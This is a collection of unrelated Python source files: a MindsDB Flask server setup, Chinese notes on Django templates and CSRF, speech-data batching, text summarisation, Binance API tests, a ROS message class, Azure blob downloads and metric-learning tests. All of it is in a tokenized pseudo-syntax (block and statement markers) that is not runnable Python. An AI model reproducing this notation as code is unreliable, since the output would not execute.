<block_start><if_stmt>no_studio<block_start>app=Flask(__name__)<block_end><else_stmt><block_start>static_path=os.path.join(config['paths']['static'] 'static/')<if_stmt>os.path.isabs(static_path)<is><false><block_start>static_path=os.path.join(os.getcwd() static_path)<block_end>app=Flask(__name__ static_url_path='/static' static_folder=static_path)<block_end>app.config['SEND_FILE_MAX_AGE_DEFAULT']=60<line_sep>app.config['SWAGGER_HOST']='http://localhost:8000/mindsdb'<line_sep>app.json_encoder=CustomJSONEncoder<line_sep>authorizations={'apikey':{'type':'session' 'in':'query' 'name':'session'}}<line_sep>api=Swagger_Api(app authorizations=authorizations security=['apikey'] url_prefix=':8000' prefix='/api' doc='/doc/')<line_sep>api.representations['application/json']=custom_output_json<line_sep>port=config['api']['http']['port']<line_sep>host=config['api']['http']['host']<line_sep># NOTE rewrite it, that hotfix to see GUI link <if_stmt><not>no_studio<block_start>log=get_log('http')<if_stmt>host<in>('' '0.0.0.0')<block_start>url=f'http://127.0.0.1:{port}/'<block_end><else_stmt><block_start>url=f'http://{host}:{port}/'<block_end>log.info(f' - GUI available at {url}')<line_sep>pid=os.getpid()<line_sep>x=threading.Thread(target=_open_webbrowser args=(url pid port init_static_thread config['paths']['static']) daemon=<true>)<line_sep>x.start()<block_end><return>app api<block_end><def_stmt>initialize_interfaces app<block_start>app.original_data_store=DataStore()<line_sep>app.original_model_interface=ModelInterface()<line_sep>app.original_integration_controller=IntegrationController()<line_sep>config=Config()<line_sep>app.config_obj=config<block_end><def_stmt>_open_webbrowser url:str pid:int port:int init_static_thread static_folder<block_start>"""Open webbrowser with url when http service is started. If some error then do nothing. """<line_sep>init_static_thread.join()<line_sep>inject_telemetry_to_static(static_folder)<line_sep>logger=get_log('http')<try_stmt><block_start>is_http_active=wait_func_is_true(func=is_pid_listen_port timeout=10 pid=pid port=port)<if_stmt>is_http_active<block_start>webbrowser.open(url)<block_end><block_end><except_stmt>Exception<as>e<block_start>logger.error(f'Failed to open {url} in webbrowser with exception {e}')<line_sep>logger.error(traceback.format_exc())<block_end>session.close()<block_end>
""" 模板语言: {{ 变量 }} {% 代码段 %} {% 一个参数时:变量|过滤器, Book.id | add: 1 <= 2 当前id+1来和2比较 两个参数时:变量|过滤器:参数 %}, 过滤器最多只能传2个参数,过滤器用来对传入的变量进行修改 {% if book.name|length > 4 %} 管道|符号的左右不能有多余的空格,否则报错,其次并不是name.length而是通过管道来过滤 {{ book.pub_date|date:'Y年m月j日' }} 日期的转换管道 """<line_sep>""" CSRF 跨站请求伪造, 盗用别人的信息,以你的名义进行恶意请求 比如:服务器返回一个表单进行转账操作,再把转账信息返回给服务器。 需要判断发送转账信息请求的客户端是不是刚才获取表单界面的客户端,防止回送请求的修改,和返回页面的修改(表单地址被修改为黑客地址,信息丢失) 防止CSRF需要服务器做安全验证 """<line_sep>""" 验证码主要用来防止暴力请求,原理就是请求页面之前生成一个动态不同的验证码写入到session中 用户登录的时候,会拿着填写的验证码和session中的验证码比较进行验证 """<line_sep>
<import_stmt>warnings<import_from_stmt>typing Dict Tuple<import_from_stmt>lhotse CutSet<import_from_stmt>lhotse.dataset.sampling.base CutSampler<def_stmt>find_pessimistic_batches sampler:CutSampler batch_tuple_index:int=0<arrow>Tuple[Dict[str CutSet] Dict[str float]]<block_start>""" Function for finding 'pessimistic' batches, i.e. batches that have the highest potential to blow up the GPU memory during training. We will fully iterate the sampler and record the most risky batches under several criteria: - single longest cut - single longest supervision - largest batch cuts duration - largest batch supervisions duration - max num cuts - max num supervisions .. note: It is up to the users to convert the sampled CutSets into actual batches and test them by running forward and backward passes with their model. Example of how this function can be used with a PyTorch model and a :class:`~lhotse.dataset.K2SpeechRecognitionDataset`:: sampler = SingleCutSampler(cuts, max_duration=300) dataset = K2SpeechRecognitionDataset() batches, scores = find_pessimistic_batches(sampler) for reason, cuts in batches.items(): try: batch = dset[cuts] outputs = model(batch) loss = loss_fn(outputs) loss.backward() except: print(f"Exception caught when evaluating pessimistic batch for: {reason}={scores[reason]}") raise :param sampler: An instance of a Lhotse :class:`.CutSampler`. :param batch_tuple_index: Applicable to samplers that return tuples of :class:`~lhotse.cut.CutSet`. Indicates which position in the tuple we should look up for the CutSet. :return: A tuple of dicts: the first with batches (as CutSets) and the other with criteria values, i.e.: ``({"<criterion>": <CutSet>, ...}, {"<criterion>": <value>, ...})`` """<line_sep>criteria={"single_longest_cut":<lambda>cuts:max(c.duration<for>c cuts) "single_longest_supervision":<lambda>cuts:max(sum(s.duration<for>s c.supervisions)<for>c cuts) "largest_batch_cuts_duration":<lambda>cuts:sum(c.duration<for>c cuts) "largest_batch_supervisions_duration":<lambda>cuts:sum(s.duration<for>c cuts<for>s c.supervisions) "max_num_cuts":len "max_num_supervisions":<lambda>cuts:sum(1<for>c cuts<for>_ c.supervisions) }<try_stmt><block_start>sampler=iter(sampler)<line_sep>first_batch=next(sampler)<if_stmt>isinstance(first_batch tuple)<block_start>first_batch=first_batch[batch_tuple_index]<block_end><block_end><except_stmt>StopIteration<block_start>warnings.warn("Empty sampler encountered in find_pessimistic_batches()")<line_sep><return>{} {}<block_end>top_batches={k:first_batch<for>k criteria}<line_sep>top_values={k:fn(first_batch)<for>k,fn criteria.items()}<for_stmt>batch sampler<block_start><if_stmt>isinstance(batch tuple)<block_start>batch=batch[batch_tuple_index]<block_end><for_stmt>crit,fn criteria.items()<block_start>val=fn(batch)<if_stmt>val<g>top_values[crit]<block_start>top_values[crit]=val<line_sep>top_batches[crit]=batch<block_end><block_end><block_end><return>top_batches top_values<block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division print_function unicode_literals<import_from_stmt>sumy.parsers.html HtmlParser<import_from_stmt>sumy.parsers.plaintext PlaintextParser<import_from_stmt>sumy.nlp.tokenizers Tokenizer<line_sep>#from sumy.summarizers.lsa import LsaSummarizer as Summarizer <import_from_stmt>sumy.summarizers.lex_rank LexRankSummarizer<as>Summarizer<import_from_stmt>sumy.nlp.stemmers Stemmer<import_from_stmt>sumy.utils get_stop_words<class_stmt>TextSummarizer<block_start><def_stmt>__init__ self count=10<block_start>self.LANGUAGE="czech"<line_sep>self.SENTENCES_COUNT=count<block_end><def_stmt>summarize_from_url self url<block_start>parser=HtmlParser.from_url(url Tokenizer(self.LANGUAGE))<line_sep>stemmer=Stemmer(self.LANGUAGE)<line_sep>summarizer=Summarizer(stemmer)<line_sep>file_1=open("summarizer_output.txt" "w+")<line_sep>file_2=open("summarizer_output2.txt" "w+")<for_stmt>sentence summarizer(parser.document self.SENTENCES_COUNT)<block_start>file_2.write(str(sentence))<line_sep>file_1.write(str(sentence))<line_sep>file_1.write("\n")<block_end>file_1.close()<line_sep>file_2.close()<block_end><def_stmt>summarize_from_text self text<block_start>parser=PlaintextParser.from_string(text Tokenizer(self.LANGUAGE))<line_sep>stemmer=Stemmer(self.LANGUAGE)<line_sep>summarizer=Summarizer(stemmer)<line_sep>file_1=open("summarizer_output.txt" "w+")<line_sep>file_2=open("summarizer_output2.txt" "w+")<for_stmt>sentence summarizer(parser.document self.SENTENCES_COUNT)<block_start>file_2.write(str(sentence))<line_sep>file_1.write(str(sentence))<line_sep>file_1.write("\n")<block_end>file_1.close()<line_sep>file_2.close()<block_end><def_stmt>summarize_from_file self file_name<block_start>parser=PlaintextParser.from_file(file_name Tokenizer(self.LANGUAGE))<line_sep>stemmer=Stemmer(self.LANGUAGE)<line_sep>summarizer=Summarizer(stemmer)<line_sep>file_1=open("summarizer_output.txt" "w+")<line_sep>file_2=open("summarizer_output2.txt" "w+")<for_stmt>sentence summarizer(parser.document self.SENTENCES_COUNT)<block_start>file_2.write(str(sentence))<line_sep>file_1.write(str(sentence))<line_sep>file_1.write("\n")<block_end>file_1.close()<line_sep>file_2.close()<block_end><block_end># t = TextSummarizer() # t.summarize_from_file("obama_short.txt") # pdf = pdfgeneration() # pdf.generate_pdf_summarizer("summarizer_output2.txt")
<import_stmt>responses<import_from_stmt>tests.util random_str<import_from_stmt>tests.util mock_http_response<import_from_stmt>binance.spot Spot<as>Client<import_from_stmt>binance.lib.utils encoded_string<import_from_stmt>binance.error ParameterRequiredError<line_sep>mock_item={"key_1":"value_1" "key_2":"value_2"}<line_sep>key=random_str()<line_sep>secret=random_str()<line_sep>params={"email":"<EMAIL>" "coin":"BNB" "network":"BNB" "recvWindow":1000 }<def_stmt>test_sub_account_deposit_address_without_email <block_start>"""Tests the API endpoint to get deposit address without email"""<line_sep>params={"email":"" "coin":"BNB" "network":"BNB" "recvWindow":1000}<line_sep>client=Client(key secret)<line_sep>client.sub_account_deposit_address.when.called_with(**params).should.throw(ParameterRequiredError)<block_end><def_stmt>test_sub_account_deposit_address_without_coin <block_start>"""Tests the API endpoint to get deposit address without coin"""<line_sep>params={"email":"<EMAIL>" "coin":"" "network":"BNB" "recvWindow":1000 }<line_sep>client=Client(key secret)<line_sep>client.sub_account_deposit_address.when.called_with(**params).should.throw(ParameterRequiredError)<block_end>@mock_http_response(responses.GET "/sapi/v1/capital/deposit/subAddress\\?"+encoded_string(params) mock_item 200 )<def_stmt>test_sub_account_deposit_address <block_start>"""Tests the API endpoint to get deposit address"""<line_sep>client=Client(key secret)<line_sep>response=client.sub_account_deposit_address(**params)<line_sep>response.should.equal(mock_item)<block_end>
<import_from_stmt>vue.bridge Object<import_stmt>javascript<class_stmt>VueDecorator<block_start>__key__=<none><line_sep>__parents__=()<line_sep>__id__=<none><line_sep>__value__=<none><def_stmt>update self vue_dict<block_start>base=vue_dict<for_stmt>parent self.__parents__<block_start>base=vue_dict.setdefault(parent {})<block_end><if_stmt>self.__id__<is><none><block_start>base[self.__key__]=self.__value__<block_end><else_stmt><block_start>base=base.setdefault(self.__key__ {})<line_sep>value=self.__value__<if_stmt>isinstance(base.get(self.__id__) dict)<block_start>base[self.__id__].update(value)<block_end><else_stmt><block_start>base[self.__id__]=value<block_end><block_end><block_end><block_end><def_stmt>pyjs_bridge fn inject_vue_instance=<false><block_start><def_stmt>wrapper *args **kwargs<block_start>args=(javascript.this() *args)<if>inject_vue_instance<else>args<line_sep>args=tuple(Object.from_js(arg)<for>arg args)<line_sep>kwargs={k:Object.from_js(v)<for>k,v kwargs.items()}<line_sep><return>Object.to_js(fn(*args **kwargs))<block_end>wrapper.__name__=fn.__name__<line_sep><return>wrapper<block_end>
<import_from_stmt>setuptools setup find_packages<line_sep>__name__="appJar"<line_sep>__version__="0.94.0"<line_sep>__author__="<NAME>"<line_sep>__desc__="An easy-to-use, feature-rich GUI wrapper for tKinter. Designed specifically for use in the classroom, but powerful enough to be used anywhere."<line_sep>__author_email__="<EMAIL>"<line_sep>__license__="Apache 2.0"<line_sep>__url__="http://appJar.info"<line_sep>__keywords__=["python" "gui" "tkinter" "appJar" "interface"]<line_sep>__packages__=["appJar"]<line_sep>__classifiers__=['Development Status :: 4 - Beta' 'Intended Audience :: Developers' 'Intended Audience :: Education' 'Programming Language :: Python :: 2' 'Programming Language :: Python :: 2.7' 'Programming Language :: Python :: 3.3' 'Programming Language :: Python :: 3' 'Programming Language :: Python :: 3.4' 'Programming Language :: Python :: 3.5' 'Programming Language :: Python :: 3.6' 'Topic :: Education' 'Topic :: Software Development' 'Topic :: Software Development :: User Interfaces' 'Topic :: Software Development :: Libraries :: Python Modules' 'License :: OSI Approved :: Apache Software License' ]<line_sep>__long_description__="""# appJar Simple tKinter GUIs in Python. """<line_sep>setup(name=__name__ packages=__packages__ version=__version__ description=__desc__ long_description=__long_description__ long_description_content_type="text/markdown" author=__author__ author_email=__author_email__ url=__url__ keywords=__keywords__ license=__license__ classifiers=__classifiers__ package_data={"appJar":["lib/*.py" "lib/*.txt" "lib/tkdnd2.8/*.tcl" "lib/tkdnd2.8/tcl_files/*.tcl" "lib/tkdnd2.8/tcl_libs/*" "resources/icons/*" "examples/showcase.py" "PYPI.md"]})<line_sep>
# # This file is part of the LibreOffice project. # # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # # This file incorporates work covered by the following license notice: # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed # with this work for additional information regarding copyright # ownership. The ASF licenses this file to you under the Apache # License, Version 2.0 (the "License"); you may not use this file # except in compliance with the License. You may obtain a copy of # the License at http://www.apache.org/licenses/LICENSE-2.0 . # <import_from_stmt>.CommonListener ItemListenerProcAdapter<import_from_stmt>.DataAware DataAware<class_stmt>RadioDataAware(DataAware)<block_start><def_stmt>__init__ self data value radioButtons<block_start>super(RadioDataAware self).__init__(data value)<line_sep>self.radioButtons=radioButtons<block_end><def_stmt>setToUI self value<block_start>selected=int(value)<if_stmt>selected<eq>-1<block_start><for_stmt>i self.radioButtons<block_start>i.State=<false><block_end><block_end><else_stmt><block_start>self.radioButtons[selected].State=<true><block_end><block_end><def_stmt>getFromUI self<block_start><for_stmt>index,workwith enumerate(self.radioButtons)<block_start><if_stmt>workwith.State<block_start><return>index<block_end><block_end><return>-1<block_end>@classmethod<def_stmt>attachRadioButtons self data prop buttons field<block_start>da=RadioDataAware(data prop buttons)<line_sep>method=getattr(da "updateData")<for_stmt>i da.radioButtons<block_start>i.addItemListener(ItemListenerProcAdapter(method))<block_end><return>da<block_end><block_end>
""" Runs tests for Ptyhon Odin SDK """<import_stmt>unittest<import_from_stmt>os environ<import_stmt>random<import_from_stmt>pymongo MongoClient<import_stmt>pyodin<as>odin<class_stmt>OdinSdkTest(unittest.TestCase)<block_start>""" Establish OdinSdkTest object """<def_stmt>setUp self<block_start>client=MongoClient(environ.get('ODIN_MONGODB'))<line_sep>mongodb=client['odin']<line_sep>self.collection=mongodb['observability']<block_end><def_stmt>tearDown self<block_start>self.collection.delete_many({"id":"test_id"})<block_end><def_stmt>test_condition_not_odin_env self<block_start>""" Run condition operation outside of Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep>odin_test=odin.Odin(config="job.yml" path_type="relative")<line_sep>cond=odin_test.condition(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(cond <true>)<line_sep>self.assertEqual(<none> result)<block_end><def_stmt>test_watch_not_odin_env self<block_start>""" Run watch operation outside of Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep>odin_test=odin.Odin(config="job.yml" path_type="relative")<line_sep>odin_test.watch(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(<none> result)<block_end><def_stmt>test_condition self<block_start>""" Run condition operation inside Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep># test True sets odin exc env to true and in turn enables logging everything to the DB odin_test=odin.Odin(test=<true> config="job.yml" path_type="relative")<line_sep>cond=odin_test.condition(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(cond <true>)<line_sep>self.assertEqual(test_desc result['description'])<block_end><def_stmt>test_watch self<block_start>""" Run watch operation inside Odin Env """<line_sep>random_int=random.randint(100000 999999)<line_sep>test_desc='test_desc'+str(random_int)<line_sep># test True sets odin exc env to true and in turn enables logging everything to the DB odin_test=odin.Odin(test=<true> config="job.yml" path_type="relative")<line_sep>odin_test.watch(test_desc <true>)<line_sep>result=self.collection.find_one({"description":test_desc})<line_sep>self.assertEqual(test_desc result['description'])<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end># run all tests
<import_from_stmt>artemis.general.dict_ops cross_dict_dicts merge_dicts<line_sep>__author__='peter'<def_stmt>test_cross_dict_dicts <block_start><assert_stmt>cross_dict_dicts({'a':{'aa':1} 'b':{'bb':2}} {'c':{'cc':3} 'd':{'dd':4}})<eq>{('a' 'c'):{'aa':1 'cc':3} ('a' 'd'):{'aa':1 'dd':4} ('b' 'c'):{'bb':2 'cc':3} ('b' 'd'):{'bb':2 'dd':4}}<block_end><def_stmt>test_dict_merge <block_start><assert_stmt>merge_dicts({'a':1 'b':2 'c':3} {'c':4 'd':5} {'d':6 'e':7})<eq>{'a':1 'b':2 'c':4 'd':6 'e':7 }<block_end><if_stmt>__name__<eq>"__main__"<block_start>test_dict_merge()<line_sep>test_cross_dict_dicts()<block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project # root for license information. <import_from_stmt>typing List<import_from_stmt>pathlib Path<import_from_stmt>azure.storage.blob ContainerClient<import_from_stmt>redact.types.file_bundle FileBundle<class_stmt>BlobReader()<block_start><def_stmt>__init__ self container_url:str prefix:str<block_start>self.container_client=ContainerClient.from_container_url(container_url)<line_sep>self.prefix=prefix<block_end><def_stmt>download_bundles self to:str<arrow>List[FileBundle]<block_start>blobs=self.container_client.list_blobs(name_starts_with=self.prefix)<line_sep>all_file_name_list=[Path(blob.name).name<for>blob blobs]<line_sep>file_bundles=FileBundle.from_names(all_file_name_list)<for_stmt>bundle file_bundles<block_start>image_blob_path=self.prefix+bundle.image_file_name<line_sep>fott_blob_path=self.prefix+bundle.fott_file_name<line_sep>ocr_blob_path=self.prefix+bundle.ocr_file_name<line_sep>image_path=Path(to bundle.image_file_name)<line_sep>fott_path=Path(to bundle.fott_file_name)<line_sep>ocr_path=Path(to bundle.ocr_file_name)<with_stmt>open(image_path 'wb')<as>image_file open(fott_path 'wb')<as>fott_file open(ocr_path 'wb')<as>ocr_file<block_start>image_file.write(self.container_client.download_blob(image_blob_path).readall())<line_sep>fott_file.write(self.container_client.download_blob(fott_blob_path).readall())<line_sep>ocr_file.write(self.container_client.download_blob(ocr_blob_path).readall())<block_end><block_end><return>file_bundles<block_end><block_end>
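A hedged usage sketch for BlobReader above; the container SAS URL, blob prefix, and local folder are placeholders.
import os

# Illustrative only: download every matching bundle under the prefix into a local folder.
container_url = "https://<account>.blob.core.windows.net/<container>?<sas-token>"   # placeholder
out_dir = "downloads"
os.makedirs(out_dir, exist_ok=True)

reader = BlobReader(container_url=container_url, prefix="forms/")
bundles = reader.download_bundles(to=out_dir)
for bundle in bundles:
    print(bundle.image_file_name, bundle.fott_file_name, bundle.ocr_file_name)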
"""autogenerated by genpy from multi_map_server/VerticalOccupancyGridList.msg. Do not edit."""<import_stmt>sys<line_sep>python3=<true><if>sys.hexversion<g>0x03000000<else><false><import_stmt>genpy<import_stmt>struct<class_stmt>VerticalOccupancyGridList(genpy.Message)<block_start>_md5sum="7ef85cc95b82747f51eb01a16bd7c795"<line_sep>_type="multi_map_server/VerticalOccupancyGridList"<line_sep>_has_header=<false>#flag to mark the presence of a Header object _full_text="""float32 x float32 y int32[] upper int32[] lower int32[] mass """<line_sep>__slots__=['x' 'y' 'upper' 'lower' 'mass']<line_sep>_slot_types=['float32' 'float32' 'int32[]' 'int32[]' 'int32[]']<def_stmt>__init__ self *args **kwds<block_start>""" Constructor. Any message fields that are implicitly/explicitly set to None will be assigned a default value. The recommend use is keyword arguments as this is more robust to future message changes. You cannot mix in-order arguments and keyword arguments. The available fields are: x,y,upper,lower,mass :param args: complete set of field values, in .msg order :param kwds: use keyword arguments corresponding to message field names to set specific fields. """<if_stmt>args<or>kwds<block_start>super(VerticalOccupancyGridList self).__init__(*args **kwds)<line_sep>#message fields cannot be None, assign default values for those that are <if_stmt>self.x<is><none><block_start>self.x=0.<block_end><if_stmt>self.y<is><none><block_start>self.y=0.<block_end><if_stmt>self.upper<is><none><block_start>self.upper=[]<block_end><if_stmt>self.lower<is><none><block_start>self.lower=[]<block_end><if_stmt>self.mass<is><none><block_start>self.mass=[]<block_end><block_end><else_stmt><block_start>self.x=0.<line_sep>self.y=0.<line_sep>self.upper=[]<line_sep>self.lower=[]<line_sep>self.mass=[]<block_end><block_end><def_stmt>_get_types self<block_start>""" internal API method """<line_sep><return>self._slot_types<block_end><def_stmt>serialize self buff<block_start>""" serialize message into buffer :param buff: buffer, ``StringIO`` """<try_stmt><block_start>_x=self<line_sep>buff.write(_struct_2f.pack(_x.x _x.y))<line_sep>length=len(self.upper)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(struct.pack(pattern *self.upper))<line_sep>length=len(self.lower)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(struct.pack(pattern *self.lower))<line_sep>length=len(self.mass)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(struct.pack(pattern *self.mass))<block_end><except_stmt>struct.error<as>se<block_start>self._check_types(struct.error("%s: '%s' when writing '%s'"%(type(se) str(se) str(_x))))<block_end><except_stmt>TypeError<as>te<block_start>self._check_types(ValueError("%s: '%s' when writing '%s'"%(type(te) str(te) str(_x))))<block_end><block_end><def_stmt>deserialize self str<block_start>""" unpack serialized message in str into this message instance :param str: byte array of serialized message, ``str`` """<try_stmt><block_start>end=0<line_sep>_x=self<line_sep>start=end<line_sep>end<augadd>8<line_sep>(_x.x _x.y )=_struct_2f.unpack(str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.upper=struct.unpack(pattern str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length 
)=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.lower=struct.unpack(pattern str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.mass=struct.unpack(pattern str[start:end])<line_sep><return>self<block_end><except_stmt>struct.error<as>e<block_start><raise>genpy.DeserializationError(e)<block_end><block_end>#most likely buffer underfill <def_stmt>serialize_numpy self buff numpy<block_start>""" serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """<try_stmt><block_start>_x=self<line_sep>buff.write(_struct_2f.pack(_x.x _x.y))<line_sep>length=len(self.upper)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(self.upper.tostring())<line_sep>length=len(self.lower)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(self.lower.tostring())<line_sep>length=len(self.mass)<line_sep>buff.write(_struct_I.pack(length))<line_sep>pattern='<%si'%length<line_sep>buff.write(self.mass.tostring())<block_end><except_stmt>struct.error<as>se<block_start>self._check_types(struct.error("%s: '%s' when writing '%s'"%(type(se) str(se) str(_x))))<block_end><except_stmt>TypeError<as>te<block_start>self._check_types(ValueError("%s: '%s' when writing '%s'"%(type(te) str(te) str(_x))))<block_end><block_end><def_stmt>deserialize_numpy self str numpy<block_start>""" unpack serialized message in str into this message instance using numpy for array types :param str: byte array of serialized message, ``str`` :param numpy: numpy python module """<try_stmt><block_start>end=0<line_sep>_x=self<line_sep>start=end<line_sep>end<augadd>8<line_sep>(_x.x _x.y )=_struct_2f.unpack(str[start:end])<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.upper=numpy.frombuffer(str[start:end] dtype=numpy.int32 count=length)<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.lower=numpy.frombuffer(str[start:end] dtype=numpy.int32 count=length)<line_sep>start=end<line_sep>end<augadd>4<line_sep>(length )=_struct_I.unpack(str[start:end])<line_sep>pattern='<%si'%length<line_sep>start=end<line_sep>end<augadd>struct.calcsize(pattern)<line_sep>self.mass=numpy.frombuffer(str[start:end] dtype=numpy.int32 count=length)<line_sep><return>self<block_end><except_stmt>struct.error<as>e<block_start><raise>genpy.DeserializationError(e)<block_end><block_end><block_end>#most likely buffer underfill _struct_I=genpy.struct_I<line_sep>_struct_2f=struct.Struct("<2f")<line_sep>
<import_from_stmt>nameko.timer timer<class_stmt>Service<block_start>name="service"<line_sep>@timer(interval=1)<def_stmt>ping self# method executed every second <block_start>print("pong")<block_end><block_end>
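A hedged sketch of running the timer service above programmatically; the AMQP URI is a placeholder for a locally reachable RabbitMQ broker, and the CLI equivalent (if the file is saved as service.py) is `nameko run service`.
from nameko.runners import ServiceRunner

# Illustrative only: start the service and print "pong" once per second until interrupted.
config = {"AMQP_URI": "amqp://guest:guest@localhost"}
runner = ServiceRunner(config)
runner.add_service(Service)
runner.start()
try:
    runner.wait()
except KeyboardInterrupt:
    runner.stop()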
<import_from_stmt>.. bp<import_from_stmt>flask request render_template flash redirect url_for<import_from_stmt>flask_login current_user login_required<import_from_stmt>app.lib.base.provider Provider<import_from_stmt>app.lib.base.decorators admin_required<line_sep>@bp.route('/slack' methods=['GET'])@login_required@admin_required<def_stmt>slack <block_start><return>render_template('config/system/slack.html')<block_end>@bp.route('/slack/save' methods=['POST'])@login_required@admin_required<def_stmt>slack_save <block_start>provider=Provider()<line_sep>settings=provider.settings()<line_sep>slack_enabled=<true><if>int(request.form.get('slack_enabled' 0))<eq>1<else><false><line_sep>settings.save('slack_enabled' slack_enabled)<line_sep>flash('Settings saved' 'success')<line_sep><return>redirect(url_for('config.slack'))<block_end>
<import_stmt>pytest<import_stmt>re<import_stmt>unittest<import_stmt>metric_learn<import_stmt>numpy<as>np<import_from_stmt>sklearn clone<import_from_stmt>test.test_utils ids_metric_learners metric_learners remove_y<import_from_stmt>metric_learn.sklearn_shims set_random_state SKLEARN_AT_LEAST_0_22<def_stmt>remove_spaces s<block_start><return>re.sub(r'\s+' '' s)<block_end><def_stmt>sk_repr_kwargs def_kwargs nndef_kwargs<block_start>"""Given the non-default arguments, and the default keywords arguments, build the string that will appear in the __repr__ of the estimator, depending on the version of scikit-learn. """<if_stmt>SKLEARN_AT_LEAST_0_22<block_start>def_kwargs={}<block_end>def_kwargs.update(nndef_kwargs)<line_sep>args_str=",".join(f"{key}={repr(value)}"<for>key,value def_kwargs.items())<line_sep><return>args_str<block_end><class_stmt>TestStringRepr(unittest.TestCase)<block_start><def_stmt>test_covariance self<block_start>def_kwargs={'preprocessor':<none>}<line_sep>nndef_kwargs={}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.Covariance())) remove_spaces(f"Covariance({merged_kwargs})"))<block_end><def_stmt>test_lmnn self<block_start>def_kwargs={'convergence_tol':0.001 'init':'auto' 'k':3 'learn_rate':1e-07 'max_iter':1000 'min_iter':50 'n_components':<none> 'preprocessor':<none> 'random_state':<none> 'regularization':0.5 'verbose':<false>}<line_sep>nndef_kwargs={'convergence_tol':0.01 'k':6}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LMNN(convergence_tol=0.01 k=6))) remove_spaces(f"LMNN({merged_kwargs})"))<block_end><def_stmt>test_nca self<block_start>def_kwargs={'init':'auto' 'max_iter':100 'n_components':<none> 'preprocessor':<none> 'random_state':<none> 'tol':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'max_iter':42}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.NCA(max_iter=42))) remove_spaces(f"NCA({merged_kwargs})"))<block_end><def_stmt>test_lfda self<block_start>def_kwargs={'embedding_type':'weighted' 'k':<none> 'n_components':<none> 'preprocessor':<none>}<line_sep>nndef_kwargs={'k':2}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LFDA(k=2))) remove_spaces(f"LFDA({merged_kwargs})"))<block_end><def_stmt>test_itml self<block_start>def_kwargs={'convergence_threshold':0.001 'gamma':1.0 'max_iter':1000 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'gamma':0.5}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.ITML(gamma=0.5))) remove_spaces(f"ITML({merged_kwargs})"))<line_sep>def_kwargs={'convergence_threshold':0.001 'gamma':1.0 'max_iter':1000 'num_constraints':<none> 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'num_constraints':7}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.ITML_Supervised(num_constraints=7))) remove_spaces(f"ITML_Supervised({merged_kwargs})"))<block_end><def_stmt>test_lsml self<block_start>def_kwargs={'max_iter':1000 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'tol':0.001 'verbose':<false>}<line_sep>nndef_kwargs={'tol':0.1}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs 
